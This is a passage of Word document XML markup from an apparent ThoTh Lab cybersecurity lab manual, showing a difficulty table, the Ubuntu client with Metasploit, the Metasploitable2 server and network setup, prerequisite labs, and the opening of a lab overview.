          <v:group style="position:absolute;margin-left:143.658142pt;margin-top:2.788364pt;width:123.1pt;height:129.4500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-16199168" coordorigin="2873,56" coordsize="2462,2589">
            <v:shape style="position:absolute;left:3588;top:1349;width:680;height:906" coordorigin="3589,1350" coordsize="680,906" path="m4212,1350l3974,1350,3589,1630,4268,2256,4212,1350xe" filled="true" fillcolor="#ccccff" stroked="false">
              <v:path arrowok="t"/>
              <v:fill opacity="32768f" type="solid"/>
            </v:shape>
            <v:line style="position:absolute" from="3974,1350" to="5287,1350" stroked="true" strokeweight=".3985pt" strokecolor="#000000">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <v:shape style="position:absolute;left:5254;top:1319;width:80;height:60" coordorigin="5255,1320" coordsize="80,60" path="m5255,1320l5266,1335,5270,1350,5266,1364,5255,1380,5275,1368,5296,1360,5317,1354,5335,1350,5317,1346,5296,1340,5275,1332,5255,1320xe" filled="true" fillcolor="#000000" stroked="false">
              <v:path arrowok="t"/>
              <v:fill type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:3973;top:217;width:1191;height:1133" coordorigin="3974,218" coordsize="1191,1133" path="m3974,1350l3974,1350m4212,1350l4048,1123m4450,1350l4121,897m4688,1350l4195,670m4926,1350l4268,444m5165,1350l4342,218e" filled="false" stroked="true" strokeweight=".3985pt" strokecolor="#bfbfbf">
              <v:path arrowok="t"/>
              <v:stroke dashstyle="solid"/>
            </v:shape>
            <v:line style="position:absolute" from="3974,1350" to="4380,101" stroked="true" strokeweight=".3985pt" strokecolor="#000000">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <v:shape style="position:absolute;left:4341;top:55;width:57;height:86" coordorigin="4341,56" coordsize="57,86" path="m4341,122l4360,116,4374,117,4387,125,4398,141,4393,118,4392,95,4393,74,4394,56,4385,71,4373,89,4359,107,4341,122xe" filled="true" fillcolor="#000000" stroked="false">
              <v:path arrowok="t"/>
              <v:fill type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:3010;top:217;width:1332;height:1133" coordorigin="3011,218" coordsize="1332,1133" path="m3974,1350l3974,1350m4048,1123l3781,1210m4121,897l3589,1070m4195,670l3396,930m4268,444l3203,790m4342,218l3011,650e" filled="false" stroked="true" strokeweight=".3985pt" strokecolor="#bfbfbf">
              <v:path arrowok="t"/>
              <v:stroke dashstyle="solid"/>
            </v:shape>
            <v:line style="position:absolute" from="3974,1350" to="2912,578" stroked="true" strokeweight=".3985pt" strokecolor="#000000">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <v:shape style="position:absolute;left:2873;top:550;width:83;height:72" coordorigin="2873,550" coordsize="83,72" path="m2920,621l2920,602,2926,588,2937,579,2955,573,2932,571,2910,565,2890,557,2873,550,2885,563,2898,580,2911,600,2920,621xe" filled="true" fillcolor="#000000" stroked="false">
              <v:path arrowok="t"/>
              <v:fill type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:3010;top:650;width:964;height:1400" coordorigin="3011,650" coordsize="964,1400" path="m3974,1350l3974,1350m3781,1210l3781,1490m3589,1070l3589,1630m3396,930l3396,1770m3203,790l3203,1910m3011,650l3011,2050e" filled="false" stroked="true" strokeweight=".3985pt" strokecolor="#bfbfbf">
              <v:path arrowok="t"/>
              <v:stroke dashstyle="solid"/>
            </v:shape>
            <v:line style="position:absolute" from="3974,1350" to="2912,2122" stroked="true" strokeweight=".3985pt" strokecolor="#000000">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <v:shape style="position:absolute;left:2873;top:2078;width:83;height:72" coordorigin="2873,2079" coordsize="83,72" path="m2955,2127l2937,2121,2926,2112,2920,2098,2920,2079,2911,2100,2898,2119,2885,2136,2873,2150,2890,2142,2910,2135,2932,2129,2955,2127xe" filled="true" fillcolor="#000000" stroked="false">
              <v:path arrowok="t"/>
              <v:fill type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:3010;top:1349;width:1332;height:1133" coordorigin="3011,1350" coordsize="1332,1133" path="m3974,1350l3974,1350m3781,1490l4048,1576m3589,1630l4121,1803m3396,1770l4195,2029m3203,1910l4268,2256m3011,2050l4342,2482e" filled="false" stroked="true" strokeweight=".3985pt" strokecolor="#bfbfbf">
              <v:path arrowok="t"/>
              <v:stroke dashstyle="solid"/>
            </v:shape>
            <v:line style="position:absolute" from="3974,1350" to="4380,2598" stroked="true" strokeweight=".3985pt" strokecolor="#000000">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <v:shape style="position:absolute;left:4341;top:2558;width:57;height:86" coordorigin="4341,2559" coordsize="57,86" path="m4398,2559l4387,2574,4374,2582,4360,2583,4341,2577,4359,2593,4373,2610,4385,2628,4394,2644,4393,2626,4392,2604,4393,2581,4398,2559xe" filled="true" fillcolor="#000000" stroked="false">
              <v:path arrowok="t"/>
              <v:fill type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:3973;top:1349;width:1191;height:1133" coordorigin="3974,1350" coordsize="1191,1133" path="m3974,1350l3974,1350m4048,1576l4212,1350m4121,1803l4450,1350m4195,2029l4688,1350m4268,2256l4926,1350m4342,2482l5165,1350e" filled="false" stroked="true" strokeweight=".3985pt" strokecolor="#bfbfbf">
              <v:path arrowok="t"/>
              <v:stroke dashstyle="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:3588;top:1349;width:680;height:906" coordorigin="3589,1350" coordsize="680,906" path="m4212,1350l3974,1350,3589,1630,4268,2256,4212,1350xe" filled="true" fillcolor="#ccccff" stroked="false">
              <v:path arrowok="t"/>
              <v:fill type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:3588;top:1349;width:680;height:906" coordorigin="3589,1350" coordsize="680,906" path="m4212,1350l3974,1350m3974,1350l3974,1350m3974,1350l3589,1630m3589,1630l4268,2256m4268,2256l4212,1350e" filled="false" stroked="true" strokeweight=".79701pt" strokecolor="#0000ff">
              <v:path arrowok="t"/>
              <v:stroke dashstyle="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:4164;top:1302;width:96;height:96" type="#_x0000_t75" stroked="false">
              <v:imagedata r:id="rId9" o:title=""/>
            </v:shape>
            <v:shape style="position:absolute;left:3926;top:1302;width:96;height:96" type="#_x0000_t75" stroked="false">
              <v:imagedata r:id="rId9" o:title=""/>
            </v:shape>
            <v:shape style="position:absolute;left:3540;top:1581;width:96;height:96" type="#_x0000_t75" stroked="false">
              <v:imagedata r:id="rId9" o:title=""/>
            </v:shape>
            <v:shape style="position:absolute;left:4220;top:2207;width:96;height:96" type="#_x0000_t75" stroked="false">
              <v:imagedata r:id="rId10" o:title=""/>
            </v:shape>
            <w10:wrap type="none"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Implementation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42"/>
        <w:ind w:left="185" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:i/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="660" w:lineRule="atLeast" w:before="171"/>
        <w:ind w:left="432" w:right="25" w:hanging="284"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-43"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:ind w:left="358"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="88"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="90"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:ind w:left="211"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="89"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="227" w:lineRule="exact"/>
        <w:ind w:left="137"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="115"/>
        </w:rPr>
        <w:t>1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85"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Time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7"/>
        <w:rPr>
          <w:sz w:val="34"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="789" w:val="left" w:leader="none"/>
          <w:tab w:pos="3008" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0"/>
        <w:ind w:left="185" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Difficulty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t> Table.</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="1956" w:val="right" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="258"/>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:353.38501pt;margin-top:1.248932pt;width:141.2pt;height:12pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:15736832" type="#_x0000_t202" filled="true" fillcolor="#bfbfbf" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:tabs>
                      <w:tab w:pos="1671" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:line="211" w:lineRule="exact"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman"/>
                      <w:w w:val="99"/>
                      <w:u w:val="single"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman"/>
                      <w:spacing w:val="-1"/>
                      <w:u w:val="single"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:spacing w:val="-1"/>
                      <w:u w:val="single"/>
                    </w:rPr>
                    <w:t>Measurements</w:t>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:spacing w:val="-2"/>
                      <w:u w:val="single"/>
                    </w:rPr>
                    <w:t>Values</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:spacing w:val="-4"/>
                      <w:u w:val="single"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:spacing w:val="-1"/>
                      <w:u w:val="single"/>
                    </w:rPr>
                    <w:t>(0-5) </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:spacing w:val="3"/>
                      <w:u w:val="single"/>
                    </w:rPr>
                    <w:t> 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10"/>
        </w:rPr>
        <w:t>Time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:w w:val="110"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="110"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="1856" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="12"/>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="1856" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="12"/>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Implementation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="1957" w:val="right" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="12"/>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="1956" w:val="right" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="12"/>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Knowledge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>4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80"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="width:141.2pt;height:12.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordorigin="0,0" coordsize="2824,250">
            <v:line style="position:absolute" from="0,5" to="2824,5" stroked="true" strokeweight=".498pt" strokecolor="#000000">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <v:shape style="position:absolute;left:0;top:9;width:2824;height:240" coordorigin="0,10" coordsize="2824,240" path="m1572,10l0,10,0,249,1572,249,1572,10xm2824,10l1572,10,1572,249,2824,249,2824,10xe" filled="true" fillcolor="#bfbfbf" stroked="false">
              <v:path arrowok="t"/>
              <v:fill type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:0;top:9;width:2824;height:240" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="1671" w:val="left" w:leader="none"/>
                        <w:tab w:pos="2823" w:val="left" w:leader="none"/>
                      </w:tabs>
                      <w:spacing w:line="211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/>
                        <w:w w:val="99"/>
                        <w:sz w:val="20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spacing w:val="-1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Score</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-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(Average)</w:t>
                      <w:tab/>
                      <w:t>1</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial"/>
                        <w:i/>
                        <w:sz w:val="20"/>
                        <w:u w:val="single"/>
                      </w:rPr>
                      <w:t>.</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="20"/>
                        <w:u w:val="single"/>
                      </w:rPr>
                      <w:t>4</w:t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2240" w:h="15840"/>
          <w:pgMar w:top="620" w:bottom="280" w:left="1100" w:right="1060"/>
          <w:cols w:num="5" w:equalWidth="0">
            <w:col w:w="2344" w:space="135"/>
            <w:col w:w="440" w:space="39"/>
            <w:col w:w="774" w:space="431"/>
            <w:col w:w="679" w:space="940"/>
            <w:col w:w="4298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931"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="141"/>
        <w:ind w:left="2926"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Knowledge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spacing w:before="143"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Required OS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="681" w:val="left" w:leader="none"/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Times New Roman"/>
          <w:w w:val="99"/>
          <w:shd w:fill="E5E5E5" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:shd w:fill="E5E5E5" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:w w:val="105"/>
          <w:shd w:fill="E5E5E5" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>Linux: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Ubuntu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18.04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LTS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(Bionic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Beaver)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1"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:sz w:val="31"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="25"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Running</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="25"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Environment:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="681" w:val="left" w:leader="none"/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Times New Roman"/>
          <w:w w:val="99"/>
          <w:shd w:fill="E5E5E5" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:shd w:fill="E5E5E5" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:w w:val="105"/>
          <w:shd w:fill="E5E5E5" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>ThoTh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Lab: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https://thothlab.org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rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:190.138pt;margin-top:10.959273pt;width:32.7pt;height:13.25pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15725568;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="false" stroked="true" strokeweight=".398pt" strokecolor="#000000">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="13"/>
                    <w:ind w:left="59"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr/>
                    <w:t>Client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80.466003pt;margin-top:10.959273pt;width:33.6pt;height:13.25pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15725056;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="false" stroked="true" strokeweight=".398pt" strokecolor="#000000">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="13"/>
                    <w:ind w:left="59"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr/>
                    <w:t>Server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2337714</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>429555</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="580548" cy="595693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48" cy="595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5.591064pt;margin-top:57.023273pt;width:28.35pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15724032;mso-wrap-distance-left:0;mso-wrap-distance-right:0" coordorigin="4712,1140" coordsize="567,0" path="m4712,1140l5279,1140m4712,1140l5279,1140e" filled="false" stroked="true" strokeweight=".3985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267.457001pt;margin-top:37.023273pt;width:68.8pt;height:40pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15723520;mso-wrap-distance-left:0;mso-wrap-distance-right:0" coordorigin="5349,740" coordsize="1376,800">
            <v:shape style="position:absolute;left:5349;top:740;width:1376;height:800" type="#_x0000_t75" stroked="false">
              <v:imagedata r:id="rId12" o:title=""/>
            </v:shape>
            <v:shape style="position:absolute;left:5349;top:740;width:1376;height:80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SimSun"/>
                        <w:sz w:val="22"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:before="0"/>
                      <w:ind w:left="32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Network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39.777161pt;margin-top:57.023273pt;width:28.35pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15723008;mso-wrap-distance-left:0;mso-wrap-distance-right:0" coordorigin="6796,1140" coordsize="567,0" path="m6796,1140l7362,1140m6796,1140l7362,1140e" filled="false" stroked="true" strokeweight=".3985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4750333</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>424475</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="595693" cy="620934"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom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93" cy="62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SimSun"/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:sz w:val="8"/>
        </w:rPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="620" w:bottom="280" w:left="1100" w:right="1060"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="141"/>
        <w:ind w:left="100"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:74.980003pt;margin-top:7.851905pt;width:453.8pt;height:47.85pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:15737856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Client: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Linux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(Ubuntu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18.04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LTS,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Metasploit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v6.0.13-dev)</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="223" w:lineRule="auto" w:before="5"/>
                    <w:ind w:left="94" w:right="5735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Server:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="-1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Linux</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="-1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(Metasploitable2)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Network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Setup:</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="244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Internet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is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connected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through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192.168.0.0/24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15"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="89"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="90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Heading3"/>
        <w:spacing w:before="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="30"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Preparations: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before="142"/>
        <w:ind w:left="100"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:74.980003pt;margin-top:7.900896pt;width:453.8pt;height:35.9pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:15737344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ind w:left="9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Know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how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Linux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(Reference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Labs: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CS-SYS-00001)</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="223" w:lineRule="auto" w:before="5"/>
                    <w:ind w:left="492" w:right="296" w:hanging="399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Basic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knowledge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about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computer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networking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(Reference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Labs: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CS-CNS-10003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(hping)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and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CS-CNS-20001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(Nmap).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15"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:ind w:left="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="89"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0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spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="151"/>
        <w:ind w:left="185" w:right="387" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:w w:val="95"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="31"/>
          <w:w w:val="95"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:w w:val="95"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="203"/>
        <w:ind w:left="185" w:right="387"/>
        <w:jc w:val="center"/>
      </w:pP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lab,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run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Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(MSF)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
